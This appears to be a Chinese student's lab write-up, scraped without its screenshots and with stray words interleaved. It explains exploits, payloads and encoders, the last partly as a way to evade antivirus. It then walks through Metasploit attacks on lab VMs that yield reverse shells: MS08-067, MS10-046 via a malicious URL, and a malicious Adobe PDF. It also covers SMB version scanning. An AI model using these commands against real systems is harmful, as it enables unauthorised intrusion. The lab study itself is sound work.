exploit
,payload
,encode
?
exploit
就至關因而載具,將真正要負責攻擊的代碼傳送到靶機中,我以爲老師上課舉的火箭和衛星的例子很是形象,火箭只是運載工具,它把衛星送入軌道就完成了它的任務,exploit
的功能就和火箭差很少。payload
也就至關於載荷,實際上就是以前咱們實驗中作到的shellcode
,exploit
把它傳送到靶機中後,它就負責執行相應的攻擊代碼。encode
也就是編碼,它主要是爲了不以前的payload
中出現壞字符,從而影響payload
的功能,其次是爲了實現免殺,不讓殺毒軟件很輕易的就發現payload
是攻擊代碼。Kali
`shell
一開始用的老師給的xp中文版虛擬機,結果一直提示沒有創建會話:
windows
後面發現虛擬機中已經針對該漏洞打了補丁,將補丁卸載後,依然沒有成功:
api
先用search ms08_067
指令查詢一下針對該漏洞能夠運用的攻擊模塊:
瀏覽器
用use exploit/windows/smb/ms08_067_netapi
使用該模塊,再使用show payloads
查看能夠供咱們使用的payload:
安全
咱們的目的是爲了獲取靶機的shell,所以這裏咱們選擇經過反向鏈接來獲取shell
的generic/shell_reverse_tcp
當payload
,使用指令set payload generic/shell_reverse_tcp
對payload進行設置:
網絡
接着使用指令show options
查看咱們須要設置的參數,發現須要設置一個RHOST(遠程主機,即靶機的IP地址)和一個LHOST(本地主機,即攻擊機的IP地址):
session
設置完相應的參數後,再次使用show options
對攻擊的選項進行查看:
tcp
接着使用exploit
指令開始攻擊,攻擊成功後獲取了靶機的shell,使用systeminfo
指令查看靶機系統信息:
工具
基本步驟仍是和上面同樣,先利用search ms10_046
指令查看能夠運用的攻擊模塊:
測試
而後查看須要設置的參數,SRVHOST填的是本地監聽主機的IP地址,LHOST也是監聽的IP地址,因此這裏SRVHOST和LHOST都應該填攻擊機的IP地址:
設置好參數後,進行查看:
使用exploit
指令執行漏洞,能夠看到生成了一個url:
在靶機的IE瀏覽器上使用該url進行訪問,在MSF終端看見漏洞執行成功:
使用sessions
指令查看當前存在的會話,能夠看到存在一個ID爲1的會話:
使用sessions -i 1
選擇會話1,成功獲取了靶機的shell,利用systeminfo
指令查看靶機的系統信息:
先使用search adobe
查詢和adobe漏洞有關的模塊,我選擇的是exploit/windows/fileformat/adobe_toolbutton
,而後使用該模塊,設置回連的payload
:
查看須要設置的參數:
設置好相應參數後,開始實施攻擊,發如今/root/.msf4/local/
目錄下成功生成了一個lxm.pdf
文件:
而後將該文件傳送到靶機上,而且在攻擊機上打開監聽:
將靶機中的pdf文件打開,攻擊機成功獲取到靶機shell:
使用show auxiliary
查看能夠運用的輔助模塊:
我使用的是scanner/smb/smb_version
,用來對靶機的smb
版本進行掃描:
設置靶機的IP地址(也能夠設置要掃描的一段範圍),以及掃描使用的線程:
使用exploit
指令開始掃描,成功掃描到靶機的smb
版本:
一開始準備利用ms14_064漏洞來進行攻擊,配置好參數後,進行攻擊,獲得一串url:
將url複製到win7的IE瀏覽器上,結果出現找不到網頁:
因而,我在想若是用最新發現的漏洞能不能攻破win7,一開始在msf上搜ms17,結果什麼也沒搜到,後面搜ms16,只找到了幾個漏洞,我從裏面選了ms16_016漏洞來進行攻擊:
因而打開kali的監聽,接着在win7上打開後門程序,使用getuid
指令查看當前用戶權限,發現已是管理員權限了,那也就沒有必要用到ms16_016漏洞了:
後續再嘗試使用其餘漏洞...